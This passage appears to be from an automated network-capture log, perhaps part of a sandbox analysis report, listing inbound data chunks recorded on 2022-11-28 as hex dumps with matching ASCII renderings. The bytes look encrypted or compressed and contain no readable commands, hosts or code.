2022-11-28 18:03:20 UTC	29	IN	Data Raw: 1a e0 84 23 16 2e 8d 87 ad d5 e8 fd aa ea 2a c9 90 74 19 e3 35 ca a8 b9 2d c1 6d 96 66 50 19 ea a8 d0 e4 6b aa bd 17 91 a0 19 ea 98 16 5e 46 ab 2e 10 91 74 98 7e 7f 65 f2 91 63 23 ba 4c de 13 9e 70 28 b7 00 85 c4 35 38 d2 fa 40 74 7b 7f 4b ac e5 ec 4c e0 a0 22 3a 9e bb da 05 e8 c1 f0 40 91 66 37 1f 6a 54 4c ae 50 96 b9 b8 96 fc 87 1d 59 6d e7 dc 76 65 e8 46 6e a9 87 19 57 05 68 66 3a 3b c7 0f 76 35 73 34 94 9b bb 6e 74 35 4f f9 41 4a 94 5a 62 97 51 a0 fb 99 19 a2 eb 58 22 14 f8 72 cf e7 f6 f1 f6 98 a7 52 ce fa a9 ee 8f 4a f1 a0 bf 04 65 0a b9 4d e1 6f d2 ec 43 6f 46 da 1c 72 32 bf 3f a9 5f 85 f0 18 67 ca c1 b4 b2 41 e4 a2 12 93 25 e3 23 ec 55 3c 2d 76 40 68 cd be 79 88 6d d1 77 ef 67 f8 8f 77 aa 07 cf bb 3a d5 61 05 b6 ea 94 ec b3 49 7a f5 4f fb c6 20 72 Data Ascii: #.*t5-mfPk^F.t~ec#Lp(58@t{KL":@f7jTLPYmveFnWhf:;v5s4nt5OAJZbQX"rRJeMoCoFr2?_gA%#U<-v@hymwgw:aIzO r
2022-11-28 18:03:20 UTC	30	IN	Data Raw: e2 84 b2 ca 54 26 1d 7b a3 c3 6b 35 82 55 81 71 e3 68 4b a5 fe ec 63 14 12 f3 aa a6 ff d8 5a 5f 65 8d ab 0b fc 01 49 6f 50 95 28 17 c5 d8 b5 2a ba 72 1a 14 b9 33 67 8a fb 15 ba 88 37 47 fd 25 93 96 df 4d 80 83 c4 48 e4 36 b8 8f 44 6f 74 08 f4 27 12 14 a0 7b 30 d0 94 ea 4d 79 ed 03 8e 75 9e 78 9f 85 7e ee 9d 05 6b 96 48 f1 50 51 d6 08 ac 13 57 a3 ae bb 41 ad 32 60 2c 49 f9 17 92 4d 7c 40 3a 1f 83 f5 e6 6d c8 22 15 1c ed 07 76 ce 23 d3 70 0c d4 00 ec 7c 48 56 4c 29 05 64 9f 5b 2a 56 73 62 fe 31 5e be de 81 35 bb df 3c de 8a a3 01 a7 95 e6 4a 66 7c fb c1 8c bc c1 34 41 21 fe 08 af 71 a4 8c 21 07 09 6f e1 87 cf eb e9 56 67 4c 3f 2f 39 1f 0e 84 fe 37 f5 9f ea c8 a3 fb 91 7b c2 9a 48 d5 f1 50 73 59 10 93 79 28 41 e2 9a 57 f3 d3 25 e0 3c d0 7e 87 ac c9 9e ea ee Data Ascii: T&{k5UqhKcZ_eIoP(r3g7G%MH6Dot'{0Myux~kHPQWA2`,IM\|@:m"v#p\|HVL)d[Vsb1^5<Jf\|4A!q!oVgL?/97{HPsYy(AW%<~
2022-11-28 18:03:20 UTC	31	IN	Data Raw: b4 c5 0b d6 5f e3 8c 81 2b f0 fa 56 57 e1 06 d1 ad d9 f7 4d 75 64 f7 8b 1e 77 7d 58 db 3c 44 ec d1 a3 76 1a 87 ec 8e d9 5d fa eb f9 cf 10 d9 ab 96 de 2b 16 99 fb d7 70 21 df 9a e0 c7 44 9d b8 b8 e8 89 83 1d 65 e4 b2 41 fd 6a bc 2d c4 1e 90 63 7a e1 70 8d d8 0b f3 7c 7b 32 0a 45 d4 52 00 ee d4 e1 21 33 e0 65 c9 6b e6 f3 8b e0 4b e8 c3 3b 1b 64 e3 a6 32 1a 02 71 9e 84 b1 1d 84 1f 8f 70 44 dd f7 fd 14 78 ac 28 ba 3c 95 3b d4 3d ef 19 59 3a 0d 32 2e 53 50 d3 ed 1f 55 4b 00 ef 49 2a 95 d5 4d 4a 66 f1 17 f6 9b 86 b6 2c f3 a2 03 21 75 1e 4d 59 b8 e3 58 db e5 a4 d3 fa 27 86 48 96 8e c0 b8 30 05 70 80 5a d7 96 07 a5 9b 49 39 e7 39 3f 59 9f e2 91 f4 ac 96 d8 ae 42 f9 37 e2 1d 8d b4 b7 25 b0 22 eb e6 14 8c e1 63 7f 4e c6 94 1c f5 a9 90 74 f0 cf 34 fb 87 83 98 13 e5 Data Ascii: _+VWMudw}X<Dv]+p!DeAj-czp\|{2ER!3ekK;d2qpDx(<;=Y:2.SPUKI*MJf,!uMYX'H0pZI99?YB7%"cNt4
2022-11-28 18:03:20 UTC	32	IN	Data Raw: 90 76 58 7c de d6 d4 2a 3f 6c cb 11 38 0b 99 1c ad b4 34 9a 90 95 23 d1 46 97 59 66 3e e1 de d3 44 aa 2b 29 0f 11 36 2a df 10 fd 3d 37 86 2e 7b 41 2f e5 40 19 d3 e0 f6 01 0e 8a cd 06 10 54 60 47 70 ce 27 be b0 03 50 e1 2b 38 6c 04 39 41 e7 b0 f6 8b 58 b3 07 2d 44 36 bf ef 4a 0a e0 e6 1c 96 20 9e a4 af 21 95 23 0f 30 32 7f f7 4a eb 4a 63 85 7e ca f0 3d e4 81 29 0c af c3 2d 22 7c 61 46 46 56 40 14 3f 30 c4 e0 f1 8c ca a0 8a d4 2b c9 16 3b 31 3a 49 4f ac 52 b6 46 fa 05 62 53 71 36 bd ab 51 1e 4d 0a 21 e0 38 70 6a cf 51 ea 05 84 6c 06 5d 01 2c 51 6e 05 b8 5b 20 75 5c c5 d8 d0 4d f3 1f e8 e9 9b 7e ca 10 b9 c8 ff 34 5a f5 3d 68 e4 16 98 9d f7 7d 8e 72 44 b2 18 e3 83 87 21 34 4b 02 da ca 21 e9 b2 99 7c 54 76 e7 c4 92 4c 51 18 ec 8e 6f 66 55 cc e9 6f 03 7b 26 fe Data Ascii: vX\|?l84#FYf>D+)6=7.{A/@T`Gp'P+8l9AX-D6J !#02JJc~=)-"\|aFFV@?0+;1:IORFbSq6QM!8pjQl],Qn[ u\M~4Z=h}rD!4K!\|TvLQofUo{&
2022-11-28 18:03:20 UTC	34	IN	Data Raw: 80 d6 1c f7 35 4d 94 28 95 28 91 d9 f6 dd e8 51 ce 54 41 a5 0a 58 a2 04 47 b5 92 68 75 72 06 d6 51 9d 31 68 1e 80 46 ae 70 b3 fa 0b a8 4e 11 1e 4e 6a 60 5e 3f 14 f3 8b ed 6c 25 d1 df 10 75 66 3f dd 9a 3d 19 97 79 88 84 ed 05 6d 98 f4 7d a5 36 89 7b 4b 05 a7 85 6a 10 4b e0 fa 4b 07 92 32 5e 37 f9 ce d2 a3 26 59 13 d0 00 75 Data Ascii: 5M((QTAXGhurQ1hFpNNj`^?l%uf?=ym}6{KjKK2^7&Yu
2022-11-28 18:03:20 UTC	34	IN	Data Raw: d8 78 79 85 9e a8 31 48 b3 85 c3 f9 60 06 3a 5d fb 35 91 e8 66 ce cf 4a 96 69 32 37 5c 6e 5e 5e fc 95 4d 8d 8f 2d 40 2d 7d 55 51 f7 97 3a 00 16 89 92 b7 a2 d7 34 82 57 c9 83 13 7b 9f 2c 4e c3 8f 3d 88 ad 7e ab 0b c7 37 3b 45 ca a1 50 66 93 03 e0 03 db 64 04 d4 13 d7 f0 c9 32 3a 7a 1b 6c f8 fb 71 54 f1 ae 29 69 f6 66 21 04 36 f4 ca 40 1c 05 14 e4 50 25 e4 d8 62 c2 26 9f f8 be de 67 ee dc 8d 7f fa 27 d0 1d da 43 1d a9 29 f8 b0 3b ee b1 c7 96 16 22 a6 83 50 46 4c d1 03 6f 33 55 7f 02 0a c7 c9 83 66 1b 96 33 6f 98 05 ab 92 57 ce d3 8d b1 d6 5a 39 c7 fc 13 51 9f 78 00 99 47 b4 d7 c2 83 71 e3 8f aa 76 7f e3 14 b6 79 f4 f3 a0 07 94 e2 a5 8a 7c 0e 86 c8 88 4b ab 5c 6c 3f 37 26 e0 68 16 4a e7 66 47 fa 7a 15 46 c4 13 c4 63 0e e1 0d 52 09 1a 62 4d 17 7c 3f f6 10 88 Data Ascii: xy1H`:]5fJi27\n^^M-@-}UQ:4W{,N=~7;EPfd2:zlqT)if!6@P%b&g'C);"PFLo3Uf3oWZ9QxGqvy\|K\l?7&hJfGzFcRbM\|?
2022-11-28 18:03:20 UTC	35	IN	Data Raw: 5f 42 d9 af 0f 1b 91 eb 1d 66 0a 7e 64 11 13 77 ab 46 b9 3b b3 14 ce e7 8b 6f f3 c5 1f 21 0f 66 56 fb 67 e9 fa 33 ac 22 20 4b 8e 95 12 4b d6 6a c8 f7 06 a1 9d 6e 67 84 02 59 6f 03 7c 99 27 46 ab 69 d8 ef 84 57 dc 9a f6 b5 44 99 4b d3 82 e7 dc 8d e3 dc 39 a2 79 e8 1c 17 09 8a 7a 5c 3d 1c 91 7f 9a 02 af b6 6f 10 3b a1 5f 64 91 81 1a 66 da 32 17 fe bd e7 3c 96 2e f9 bc 6c b3 ca 87 58 68 53 6f 85 65 35 2d 43 2d 2f f3 55 f6 a7 b5 d1 8d 80 e9 12 f9 f4 d8 af 0f bd 81 9b a2 28 43 8c 96 b6 a9 00 91 fd 5b 22 d4 f8 a8 b7 00 85 7f 21 87 1d 54 57 1e 2c c4 a4 6e c6 b3 54 d3 93 4f 68 a1 31 e5 3c ba 24 c5 ad f4 43 51 2b 2b dc b3 b9 ff cc b6 bc ea c7 e6 2a 01 5f 27 9c d7 3e 5e 48 c5 65 c2 6c f3 03 90 98 a5 7a 38 22 ba cd 8d 9e 67 f9 21 b6 fd 36 84 06 34 ba 40 1b b2 c4 02 Data Ascii: _Bf~dwF;o!fVg3" KKjngYo\|'FiWDK9yz\=o;_df2<.lXhSoe5-C-/U(C["!TW,nTOh1<$CQ++*_'>^Helz8"g!64@
2022-11-28 18:03:20 UTC	36	IN	Data Raw: 37 35 1d ce c7 61 ce c0 a2 ae 5e 1e 05 07 04 a3 95 9a 9b 29 50 66 fe e1 05 80 71 af 10 44 fb f9 a1 a6 ab 28 03 80 5b f9 73 d2 20 dc 3d 0c 09 4b ac f1 cc dd 18 00 c2 83 80 5c d1 29 0e 3b db 5b ba d9 f8 eb 4e 79 12 33 46 f0 98 c4 32 79 a3 d7 3a d5 13 c9 f1 ad 48 74 f3 ce e1 71 3c 8a ce 14 43 11 d7 5b 2b a5 de 71 96 fc 52 f8 da af 3e da 30 69 95 d5 e9 ba 59 dd 2f ea 9b 7d c6 da fa 05 aa ba aa 22 3c ff 1c 5a 75 d9 fc b5 6d f5 f4 54 f5 0f 05 9f 98 34 b7 12 b6 d4 ea 2c 5e 55 14 75 04 9e 4a 7c c9 23 e6 00 ed 97 d0 cb 7d 83 c0 48 6f 06 99 52 06 88 5c 0c 00 f7 d2 20 2a 3f 6d a3 c7 ba 96 57 ac aa 19 2c c3 fd 5f a3 4b 32 83 0e 48 17 d5 2e d7 d0 d2 89 68 0f 5b 26 49 b8 c0 ac 30 60 46 c1 31 b6 82 c4 fc d5 c4 b9 9c 01 64 09 a1 59 2a 12 cb 9e fb ce dd 56 b0 03 3a e2 65 Data Ascii: 75a^)PfqD([s =K\);[Ny3F2y:Htq<C[+qR>0iY/}"<ZumT4,^UuJ\|#}HoR\ ?mW,_K2H.h[&I0`F1dYV:e
2022-11-28 18:03:20 UTC	37	IN	Data Raw: 16 6e 47 9d de 99 69 44 0d 21 7f f3 82 50 6d 7f 4e b4 5c 8d 80 ff 21 7a ff 90 ee b7 59 b6 4f b9 81 66 c8 ca dd d6 a2 c6 4d e0 36 6f 72 21 e7 37 66 10 cf b3 91 90 b9 93 c7 b4 17 78 2f 1b 32 c9 05 ed ad b6 e3 9b 2a 1d 5a 40 0a 4f ad eb 72 ce 81 f9 08 01 3d e9 b4 b1 bc 5b e5 1c 71 e5 48 ff 7a c4 32 b8 40 0b fe 8b ae 53 57 9c 5f e7 55 d3 7b 7b ec 0d a6 f6 65 be 4f e2 a2 4d 9d c3 08 74 10 fe a5 8c 96 c4 23 96 fc 29 24 32 60 e7 dc c9 df af 98 4b d0 18 7f 48 dc 4b 2b 30 c6 74 87 1b 8d 0d 33 7f b8 1e 32 4f 79 ef 8f 3b d5 3a 5a 4d 94 6a d7 d5 e9 0d 83 cc db 35 4d ba 75 b3 49 fb f9 84 14 5d fa d9 51 06 ee a0 40 5d 82 10 04 ec 68 b9 4d d2 38 7e 14 36 7f 93 8e 1c dc 94 36 58 7f 90 af 8a c0 ea 37 50 a0 39 45 c0 b6 42 c3 c6 8a 22 7a 30 93 b1 df b1 7f f4 95 f3 7f c5 e9 Data Ascii: nGiD!PmN\!zYOfM6or!7fx/2*Z@Or=[qHz2@SW_U{{eOMt#)$2`KHK+0t32Oy;:ZMj5MuI]Q@]hM8~66X7P9EB"z0
2022-11-28 18:03:20 UTC	39	IN	Data Raw: 79 29 ae 69 25 2f 92 f1 af c9 b0 e3 ce 0d 96 8d cb ce 2d 6b f9 0e a4 d4 ab 97 cd 9e 06 b5 c8 d6 57 63 46 a3 d4 00 f5 95 a9 f6 56 45 68 97 fb 31 67 05 1d 13 f3 f9 c5 b2 8a e3 a5 2c 0a 6b 04 f1 88 b5 54 a3 64 90 60 98 5e 3e be d9 8d 6f ec 3b d1 d6 71 66 df 79 d5 a3 f6 9b 14 53 68 54 b5 6b 47 d0 cd 1b d1 96 c9 bb 90 fd 1a e8 f2 5a 2b 50 a6 9c 11 9b 6e ff 8f 74 55 8e 65 f8 39 9f 80 c6 ea 01 05 e1 c7 25 1e d7 16 c4 d2 1d 0d 59 a4 f1 b8 04 54 cd 15 b6 c5 f0 57 7a e5 d5 d5 6b 08 52 ca f1 f6 4a e6 19 16 6c e7 7a 7d ab 51 e6 eb 80 7a 13 83 11 57 f2 88 7c 4f 8a 04 09 4a 95 23 f7 ba 2c 45 c3 89 fa ce d3 3c de 62 a3 16 ca 0f 16 cf c6 9b d3 e7 73 43 42 9a 55 55 ce 0c 76 aa b1 fb 34 93 60 0d 63 94 f0 e2 72 56 ed cf 27 b1 69 9a f8 08 bf 7c 8f a0 1a ab 35 ad 79 f8 d2 33 Data Ascii: y)i%/-kWcFVEh1g,kTd`^>o;qfyShTkGZ+PntUe9%YTWzkRJlz}QzW\|OJ#,E<bsCBUUv4`crV'i\|5y3
2022-11-28 18:03:20 UTC	40	IN	Data Raw: f4 78 70 26 80 72 3e 10 19 1c 45 f3 0d 8f 90 0b f0 bf e8 96 9e 62 50 bb 98 f7 2d a8 57 2f 6f 72 fb 16 d3 7b 93 35 9c 31 4c 00 ed 56 fd ad 06 d0 dd be 8b 75 ba a9 22 e4 1f 15 96 36 ba cc 13 6c 0f a5 2f b5 bb ea 33 5c f0 c9 98 be b9 62 0c 3b bb 46 db 9b 66 33 65 ca e8 64 a7 8b 7f 42 e3 76 90 2e 5e 95 53 49 db 57 78 63 54 a2 02 4d ce e7 32 d7 c4 b5 f6 5c 58 26 f6 5c 1d 1e cf d8 55 2e e7 24 a5 2b ae 24 74 94 0a 91 97 ce 3e d3 96 27 14 81 ed b5 da f4 ee 1b 65 6a c5 1d 10 3f 0c 89 9f d4 50 4b 85 c0 d8 95 b1 0a 81 7f f4 00 a8 21 d2 37 cf d3 67 2c 10 ff 04 85 d0 2e 03 6e 7e 5e ed 5c de 96 11 75 79 a3 fe 30 ee a0 b4 09 98 84 fd 1b 58 db fd 7e 4d 04 d0 5e 59 b5 d7 2d 4c 44 00 7b ad 0a 3d d1 34 da 0f c7 73 b5 3e 3f ea d4 e2 91 26 05 26 dc fc 98 84 a6 f0 8d 8e 68 33 Data Ascii: xp&r>EbP-W/or{51LVu"6l/3\b;Ff3edBv.^SIWxcTM2\X&\U.$+$t>'ej?PK!7g,.n~^\uy0X~M^Y-LD{=4s>?&&h3
2022-11-28 18:03:20 UTC	41	IN	Data Raw: ab 13 ae 88 3d 8d 05 eb 67 eb 44 44 b3 a1 fb 7f 2d 88 17 7c 99 11 61 1e 66 5b 3e 4b 89 4a 53 96 00 46 50 00 40 e2 62 69 80 8a 1e 57 be 7a dd 88 ac 0c 6d 82 3d 8e 10 1d 5e dd 2e 58 55 75 6d 00 57 e6 a1 33 41 fb da b0 85 b7 8b 0b e9 e5 28 5c 42 db 05 74 04 5e 21 af d5 60 d6 4a 76 ce 27 d5 4e 00 25 e9 bb 83 1d 0c 43 c8 a2 4c f6 71 79 cb 95 f1 fe 9b 38 d0 b6 eb 04 44 aa 3b 20 aa 0a cb 1b a7 5f cf 78 8a c1 83 73 d6 c1 34 40 21 fe 0c c9 16 98 be 2d fb 78 8b 9c 6b e7 d3 b9 c3 13 17 28 dd 5c a6 47 07 d2 fc ce a0 1a cb 66 07 12 bf 7d 49 a8 2a 38 2b d6 a5 b1 ac 85 a0 4d 74 16 d9 f5 cb 59 34 3f 16 61 ac 01 ec 7d 56 36 b8 28 42 5d 32 fb 71 02 0e e0 a2 cc 3a 90 8f 3c 9b 8c 7d 13 4f d0 26 79 4d 75 f3 df 2e 9b 23 36 05 f3 2d 48 38 09 9d a8 48 1c 18 2e 6a 7e e5 cb cf 41 Data Ascii: =gDD-\|af[>KJSFP@biWzm=^.XUumW3A(\Bt^!`Jv'N%CLqy8D; _xs4@!-xk(\Gf}I*8+MtY4?a}V6(B]2q:<}O&yMu.#6-H8H.j~A
2022-11-28 18:03:20 UTC	42	IN	Data Raw: 5f 0c 95 6e 7d 2b 48 4e c4 ef 01 eb 3d f9 eb d7 36 dc f4 c5 62 b7 b8 bb 56 8c a9 0d 6b bc e3 b2 0f ce 72 bb 7d ae 25 fe 96 2e b3 67 43 99 8e a0 e6 fb 72 2c 98 f8 95 ae 63 1f 94 7e 38 6d e3 02 6c e3 75 25 e0 8b 0b a8 a9 5a 7e 7b d3 da f5 37 5f fc f2 90 90 ae 1b 2d e2 b8 7f d3 c9 d9 d7 82 57 b2 ce 73 39 d9 11 a0 be 9f 2e 75 d2 ec c1 8c 2a b1 67 ad 0d 56 09 67 b7 6b c7 ea c8 8f 4d 6a 4f 2e 59 31 de 97 a6 98 21 fb 0c a6 fc 65 8b cc 27 0f 44 56 04 15 29 6b e4 8d 2c db f5 65 dd d5 5d 7f ac 4a cd 99 4c ec 18 18 7e e1 2d 40 b6 80 5d 1a ae ab cd b6 38 35 7b b4 16 28 9c 58 82 b5 f4 5d 4a ae 06 eb c4 3b c2 9f 50 c5 02 b5 af ac fc 8f 00 ad c5 b3 7e 93 1d 27 78 99 ac 7c f6 d6 8a 85 03 92 bf ae 48 5f 06 66 88 dc 05 80 40 76 f7 c5 8f aa 6d bf 46 94 7f 53 52 af cc c7 e6 Data Ascii: _n}+HN=6bVkr}%.gCr,c~8mlu%Z~{7_-Ws9.u*gVgkMjO.Y1!e'DV)k,e]JL~-@]85{(X]J;P~'x\|H_f@vmFSR
2022-11-28 18:03:20 UTC	43	IN	Data Raw: 4a 40 2c 62 8a f0 bf 5e 52 88 22 98 e2 85 e0 5a d2 ec 96 3d 7e 96 87 65 39 8c be 72 1a a6 b0 86 2a 16 b8 95 2b 44 62 52 1f 08 05 5e fa df 4a ee 7e 78 83 97 ed b3 a5 93 15 da 23 dc ef a9 02 10 9f 8b 18 46 9b 0b f8 ef 0b 13 a8 2e 11 ee cd a6 ff fa 19 4d 17 cf 46 8b c7 4e 26 18 1a 6e 00 23 ad 79 f2 bc 33 97 07 66 2d d6 20 ab ac 85 a0 43 ea 6e 5d 66 39 25 e0 cc a6 4d 5f 25 ba 2d 57 25 f9 77 ea c0 ff d6 e7 75 a8 46 7e 57 10 16 3d 89 62 1a 09 00 a4 c2 81 60 42 c8 75 bf 76 8f 97 c9 90 aa 9c 03 61 a3 e9 cf 43 d7 65 ef 46 2f 14 06 97 ac cd 7e 1c 5d 44 67 fc e6 f8 92 bd 12 50 85 a6 13 e5 a8 95 fc 65 d3 29 74 e6 12 57 65 91 2a b5 ce f9 8b f9 6e 47 ca e5 42 7e 0d e5 0d 7d 53 96 44 d9 4e 77 0f 15 8d f4 b6 88 59 9f 00 55 99 64 e1 0b 70 f0 1a f3 b2 d8 af e4 42 ba c4 54 Data Ascii: J@,b^R"Z=~e9r+DbR^J~x#F.MFN&n#y3f- Cn]f9%M_%-W%wuF~W=b`BuvaCeF/~]DgPe)tWenGB~}SDNwYUdpBT
2022-11-28 18:03:20 UTC	45	IN	Data Raw: 06 0b 75 2c cf 80 ed 6c ac 1b 7a fd 17 46 19 8e e8 7f 80 a1 ce fe fd bc 14 da 67 f8 92 0a a4 10 17 fd 8d dc c7 a5 3a fc 96 4c 29 0f 63 88 5c 37 b6 3d a7 09 a0 dc e8 15 24 e0 de a5 6f 86 f2 86 ce 15 7f ba 4e 44 48 7e 02 27 06 66 cb 9a 2d ad b6 c6 ae 52 92 94 e2 91 a4 f5 a5 50 37 98 12 24 40 21 5b 43 7f de 3a b7 02 45 ff f0 0d 50 ac ac c8 6f 61 88 13 7b f0 a5 d3 35 b5 47 1b e5 a9 02 c9 bb e0 ce 09 85 8b cc 9c 0a a6 66 1a 6a 5e 7e 5f 68 95 ff 3d cd c5 54 55 74 6e f0 71 54 cc 86 5b 40 31 10 f8 79 03 6d 6f c2 25 44 2d 9e 2f 6d 6f 71 2a c2 8d 7c 94 90 3c 3a 22 e3 83 be fe 81 e8 67 f7 10 47 f3 a4 4a 04 86 d6 cb f5 e4 bf 9c af 70 fb 80 41 d9 2e c9 32 55 05 15 a0 ce b3 76 0c 12 96 72 f1 c7 44 ab fe 8b 3c 22 d9 e5 34 e4 74 2e 86 16 33 96 78 0c 3a 1e 39 2b 91 f8 2e Data Ascii: u,lzFg:L)c\7=$oNDH~'f-RP7$@![C:EPoa{5Gfj^~_h=TUtnqT[@1ymo%D-/moq*\|<:"gGJpA.2UvrD<"4t.3x:9+.
2022-11-28 18:03:20 UTC	46	IN	Data Raw: 10 b6 7e 2c 26 bc 28 17 b5 10 0f 07 fd ae 48 a7 1a bf 23 3c d4 23 8e 49 54 a6 c0 84 3f a5 23 53 bd 7c 88 57 9d 21 4f 20 ad a5 07 6c 7c 67 25 50 15 e1 da f6 ef 90 fd fb c1 71 7d ae 83 28 cb cb d1 20 2b 5e cb 75 ec cc ef a7 70 ba c8 ff b7 d6 4a a5 f1 ea a7 3d a1 5d 72 ab 57 1d 23 16 8e cb d8 9f 7c 3f 04 0d 86 99 01 ea 27 83 67 b1 e7 12 3d 01 62 a1 13 99 24 b2 6d 7b 7c ba 8f e1 2d fe 0e 32 a5 45 f6 14 dc 3e 91 b8 19 56 66 1c 8b 60 9e 55 f3 82 09 a9 f6 8e 71 d9 fd 78 50 21 7f fe 6f 9b 8c 34 c3 1b b9 81 5c 1c da 58 d1 28 3a 2a 1f c9 6f bc 67 d2 a3 b0 04 ca 97 c6 61 cc da 00 36 66 ec d7 e4 cd 6d d1 42 1e 8e 35 92 9f 16 f4 44 0f a7 b0 46 f5 10 86 d6 72 48 01 8c 94 f6 39 d7 1d 6e 0b 08 f7 40 c9 50 e7 c0 1a 54 fe fd 65 4f 17 9c 9f 87 ed 2c 84 f2 f7 be 82 74 d3 23 Data Ascii: ~,&(H#<#IT?#S\|W!O l\|g%Pq}( +^upJ=]rW#\|?'g=b$m{\|-2E>Vf`UqxP!o4\X(:*oga6fmB5DFrH9n@PTeO,t#
2022-11-28 18:03:20 UTC	47	IN	Data Raw: e0 1b 65 b7 99 93 28 31 6d 98 cf ad 32 20 28 0a e2 8d d2 bf 55 9d f8 de 9a 07 cd 99 f3 48 82 59 98 ad f3 f5 15 f6 5a 94 cc 74 62 56 41 88 3d 88 5e c6 b8 79 00 41 de 34 ff 04 fa 2b 7c fb ae 1b 75 63 04 d4 06 26 89 41 0a 40 54 68 0e e9 86 c6 22 0a 3d fa 64 0c 6a 7b 2f b0 1b 1a 0a 24 5b 10 e4 50 13 6f da 07 05 08 60 a9 ea 47 94 58 dc 75 05 5f 81 d5 1d 80 9c f0 87 f1 82 05 99 eb b1 86 9a 08 e2 5c b7 7e ad 7c a3 41 37 cf aa 80 36 2a 2e 8e 0c 67 97 32 c5 40 09 c1 c3 c3 f1 5b 17 9f 12 7d ae 7c 26 bb 6c 50 60 87 95 ac d9 bc 1a ac 82 71 50 b8 22 6c f9 66 93 e7 ec 0c 23 5d b2 68 db df 0d 75 54 f4 fc 34 a5 1c 64 62 89 66 67 cb b3 17 0a c1 a8 69 d1 2b 41 8a 8d ee a1 cf 37 9b 76 5b 53 68 56 3d 08 cf 07 cd 6c 24 ed a9 32 e0 15 01 c7 fb 1b 2e 50 00 90 a1 64 a6 b9 0a e4 Data Ascii: e(1m2 (UHYZtbVA=^yA4+\|uc&A@Th"=dj{/$[Po`GXu_\~\|A76*.g2@[}\|&lP`qP"lf#]huT4dbfgi+A7v[ShV=l$2.Pd
2022-11-28 18:03:20 UTC	48	IN	Data Raw: 08 ff 59 44 46 ca 90 0c 3a 9e e6 ce a5 a6 3d 18 6c 29 03 52 98 1f 07 41 a1 bd e3 a2 d5 90 f1 12 76 17 da 06 7b fd 11 a0 ef 18 5e 2f 07 47 c0 14 3d e2 4d 04 0d 21 72 cd 6e 4b b2 4a 6f d5 4a e3 20 b0 1a 0d 24 40 59 29 27 fe 4b 4a a3 72 cc 24 15 47 30 ea df b7 4e 48 68 89 3f 5d cb 5f 10 ea 52 bd d3 e0 36 6f 3e d1 57 98 ca 87 b9 b8 b0 2b 14 1f 50 0d 1c 93 67 e4 67 99 9f cf 06 b5 4f e9 e2 29 04 49 80 2a a4 7d 8f 67 a0 29 8d c1 8e 19 80 cd 43 a4 1a c5 d0 f5 70 85 e5 6b 9d af aa 20 f9 3c ea 12 3f a7 e5 ec 90 13 74 ff 78 db a6 4f a9 44 67 88 a1 a5 7b e1 9b 77 62 4c 14 ee db 01 84 ec 73 2a 8a a5 e7 2f 9d 04 72 3e 61 fa cf b6 d0 99 a9 d4 67 76 bc c4 7d 04 e9 e6 4e ab 0d 6d 41 05 47 40 0d 3b 04 c5 62 37 44 fe e0 73 a8 0d e0 f9 cc 4f 36 cd 72 cf c5 bf f1 2f a7 df 25 Data Ascii: YDF:=l)RAv{^/G=M!rnKJoJ $@Y)'KJr$G0NHh?]_R6o>W+PggO)I}g)Cpk <?txODg{wbLs/r>agv}NmAG@;b7DsO6r/%
2022-11-28 18:03:20 UTC	50	IN	Data Raw: 0a f8 71 54 02 aa 36 a5 31 10 a4 71 03 6d fa fd b6 0b 2d 9e 8b 65 6f 71 23 8e 04 40 94 90 90 32 22 e3 24 e2 25 8d e8 67 53 18 47 f3 80 05 c8 4e d6 cb 49 ec bf 9c 65 34 c3 fe 41 d9 8a c1 32 55 f4 f9 e7 b5 b3 76 a0 1a 96 72 0b 8a 7c 9b fe 8b 98 2a d9 e5 08 91 d2 89 86 16 ef 9e 78 0c 74 95 ea 22 91 f8 ca e2 ce ed ab 62 c7 af Data Ascii: qT61qm-eoq#@2"$%gSGNIe4A2Uvr\|*xt"b
2022-11-28 18:03:20 UTC	50	IN	Data Raw: da 96 bb 54 d2 45 68 91 17 25 48 2e 47 8b bb 4a 1c 28 2c b1 5b 1d 64 c0 a8 b5 06 af a0 d8 16 3b 21 fa 61 86 f7 d4 3e 0d 66 29 cf 21 b2 17 d7 e4 08 a1 19 97 0a 45 6f 02 c6 85 3a 80 13 2a 9f e7 2e 6b ea 7e c7 ff 92 63 11 64 87 60 ab 0a f9 82 3d 9b f6 5e 21 a5 dc 9b db 21 c8 57 0f 5f cc be 21 a7 50 51 8f f1 22 94 e2 d5 2a 3b a8 7d c6 8b 7d 37 dd ea 54 65 9a 8b 4c 5a 2e 4e fc af c5 cc 83 9f c7 9f 3d 19 4f 8a c7 f7 78 88 61 84 4e ca 45 49 b9 33 cf d7 04 2e f6 0b 01 88 56 e9 0f d4 b4 fa f4 72 43 3e 66 71 ab 73 37 b3 af 0a f8 9b d0 56 20 af 53 9d 29 47 56 ed 09 87 a0 bb d8 8b 93 c4 d4 8f 89 ad cb e8 3c 14 e3 b7 33 97 1a b4 bb 72 62 a6 cf 84 06 37 26 16 fa 86 e4 29 05 3e 16 c7 60 0d ea 9e 29 e9 5d d6 ea 4a 86 76 99 fd 90 3c 8f f2 b1 62 d8 9d 2c da 45 69 60 d6 dd Data Ascii: TEh%H.GJ(,[d;!a>f)!Eo:.k~cd`=^!!W_!PQ";}}7TeLZ.N=OxaNEI3.VrC>fqs7V S)GV<3rb7&)>`)]Jv<b,Ei`
2022-11-28 18:03:20 UTC	51	IN	Data Raw: 67 67 e4 07 35 7b 38 bc 96 6b 6a 2f 1b 6c 6a 57 29 a0 bb 15 57 cf 99 d6 ce 01 d6 48 ba b5 c7 7d 93 2d d4 8a 6b 47 63 39 ef b8 bf 53 41 65 93 f3 e5 92 ea 2d fd 57 f2 03 70 51 8b b2 bc 06 58 9b f7 7c 2a 9f 8a fb 67 fc a9 f9 44 68 5d 08 84 2c ae 82 46 3f 00 a7 97 61 ce c6 44 f5 b5 75 73 0c 69 5f be a6 bb 4b e7 94 e3 0a 4d c1 eb 15 53 93 23 90 46 b4 d0 c3 08 87 c7 b3 cb 3a d6 20 6a d1 b5 5c 67 f8 be 62 9e ae d0 f5 4e 8a 39 5a ed e5 e0 d9 dd 4a 7f 2e f4 98 ee bc 52 09 98 31 e0 81 9a 1f 5c aa c1 8e 35 03 cb 1c 50 76 8e 14 50 ac 95 4a ed e0 cb 9a b3 ca 50 f4 69 5a 45 66 1f 6e ad a4 5a c8 c3 dd 22 82 e8 8e 30 a5 2b 51 02 5a e6 d1 41 0f 80 d4 1e c9 0f ea 58 81 3c b7 39 f5 83 2a 22 2a f6 63 a9 02 22 57 a6 df ce 8d 70 52 61 f5 a6 38 61 e1 aa 3b 7b ce 3d 50 dc a5 b5 Data Ascii: gg5{8kj/ljW)WH}-kGc9SAe-WpQX\|gDh],F?aDusi_KMS#F: 